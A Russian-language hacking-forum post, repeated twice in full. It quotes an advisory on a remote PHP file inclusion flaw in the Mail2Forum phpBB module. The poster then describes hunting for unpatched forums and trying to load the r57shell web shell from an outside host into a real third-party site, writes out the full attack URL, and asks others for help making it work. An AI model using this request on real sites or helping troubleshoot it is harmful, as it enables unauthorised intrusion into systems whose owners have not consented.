Schooly_D
09.08.2006, 10:49
19 июля, 2006
Программа: Mail2Forum (модуль к phpBB) 1.2, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
http://www.securitylab.ru/vulnerability/270750.php
####
Делать было нечего, дело было вечером, а именно, забрел на секлаб, прочитал про данную уязвимость и очень захотел проверить состоятельность админов многострадального phpBB!
После получаса игры со строкой браузера и с поисковиком, отчаялся найти непропатченные форумы, как наткнулся на один сайт , попытался заинклудить шелл по описанию в секлабе, вроде фишка прошла, в строке браузера имею..
_http://site.eu/forum/m2f/m2f_phpbb204.php?m2f_root_path=http://rst.void.ru/download/r57shell.txt/
после ее ввода нажимаю Enter и лицезрею ГЛАВНУЮ СТРАНИЦУ САЙТА РСТ!
я же вроде инклудил шелл а получил лишь главную страничку!
Странно получается, вроде инклуд не локальный (include_path='.:')...
Пробовал подключать залитый на народ.ру remview, или ничего... или ошибки :confused:
помогите разобраться :confused:
Программа: Mail2Forum (модуль к phpBB) 1.2, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
http://www.securitylab.ru/vulnerability/270750.php
####
Делать было нечего, дело было вечером, а именно, забрел на секлаб, прочитал про данную уязвимость и очень захотел проверить состоятельность админов многострадального phpBB!
После получаса игры со строкой браузера и с поисковиком, отчаялся найти непропатченные форумы, как наткнулся на один сайт , попытался заинклудить шелл по описанию в секлабе, вроде фишка прошла, в строке браузера имею..
_http://site.eu/forum/m2f/m2f_phpbb204.php?m2f_root_path=http://rst.void.ru/download/r57shell.txt/
после ее ввода нажимаю Enter и лицезрею ГЛАВНУЮ СТРАНИЦУ САЙТА РСТ!
я же вроде инклудил шелл а получил лишь главную страничку!
Странно получается, вроде инклуд не локальный (include_path='.:')...
Пробовал подключать залитый на народ.ру remview, или ничего... или ошибки :confused:
помогите разобраться :confused: